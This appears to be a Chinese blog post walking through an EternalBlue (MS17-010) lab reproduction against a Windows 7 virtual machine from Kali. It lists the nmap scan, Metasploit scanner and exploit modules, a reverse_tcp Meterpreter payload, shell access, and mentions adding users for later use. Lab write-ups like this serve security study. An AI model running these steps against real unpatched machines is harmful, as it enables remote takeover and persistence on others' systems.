永恒之蓝复现

目录

1.知识点:

2.前提准备

           3.复现


1.知识点:

(永恒之蓝适应低版本的电脑没有打ms17_010的补丁,现在win7以上的高版本已经不可以使用)

百度百科:永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

攻击方式 :

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本次黑客使用的是Petya勒索病毒的变种Petwarp,攻击时仍然使用了永恒之蓝勒索漏洞,并会获取系统用户名与密码进行内网传播。

本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术,使得病毒可以在短时间内呈爆发态势。同时,该病毒与普通勒索病毒不同,其不会对电脑中的每个文件都进行加密,而是通过加密硬盘驱动器主文件表(MFT),使主引导记录(MBR)不可操作,通过占用物理磁盘上的文件名,大小和位置的信息来限制对完整系统的访问,从而让电脑无法启动,相较普通勒索病毒对系统更具破坏性。

msfconsole 简称 msf 是一款常用的安全测试工具,包含了各种常见的漏洞利用模块

2.前提准备

1.kali攻击机

2windows 7 x64 :

安装win 7 只需要和物理机一样的步骤安装即可 要关闭防火墙

3.复现

在任务开始前我们也先要知道两个机器的ip地址 kali使用ifconfig win7使用ipconfig

kali :192.168.1.222 win7:192.168.1.18

然后我们用kali机器对win7进行ping指令 看看能不能ping的通

永恒之蓝复现_第1张图片

 发现ping得通于是我们可以开始复现永恒之蓝

kali打开终端 使用代码 nmap -sV 192.168.1.18

永恒之蓝复现_第2张图片

发现一个win7 的445端口的一个于是我们可以运用永恒之蓝 因为永恒之蓝就是运用445端口的漏洞进行攻击

我们运用msfconsole这个工具 是kali自带的

通过search ms17_010查找永恒之蓝的漏洞

永恒之蓝复现_第3张图片

 0是永恒之蓝的攻击

3是永恒之蓝扫描模块

于是我们先复制3对我们的win7进行扫描

 当我们输入auxiliary/scanner/smb/smb_ms17_010扫描模块后

还要输入我们要对的win7ip地址

运用set rhosts + IP地址的格式 如 set rhosts 192.168.1.18

然后run

 

得到了存在漏洞 Host is likely VULNERABLE to MS17-010! 说明我们可以运用 MS17-010漏洞进行注入

于是我们和运用扫描模块一样运用攻击模块

显示

No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

意思是未有效负载

百度后运用指令

set payload windows/x64/meterpreter/reverse_tcp

可以实现有效负载

永恒之蓝复现_第4张图片

执行成功

出现这个说明植入成功

于是我们可以对win7电脑进行访问

运用shell指令可以访问控制台

永恒之蓝复现_第5张图片

 发现变成了windows的控制台的模式

于是我们可以对该电脑进行操作

比如创建一个文件夹 1

永恒之蓝复现_第6张图片

 永恒之蓝复现_第7张图片

 永恒之蓝复现_第8张图片

 会发现我们创建了一个文件夹 1 实现了对win7电脑的控制

我们还可以创建新的用户 便于后期的操作

于是我们就可以在kali终端中运用cmd指令对win7电脑实现操作

到此 永恒之蓝漏洞复现结束。

你可能感兴趣的:(安全,web安全)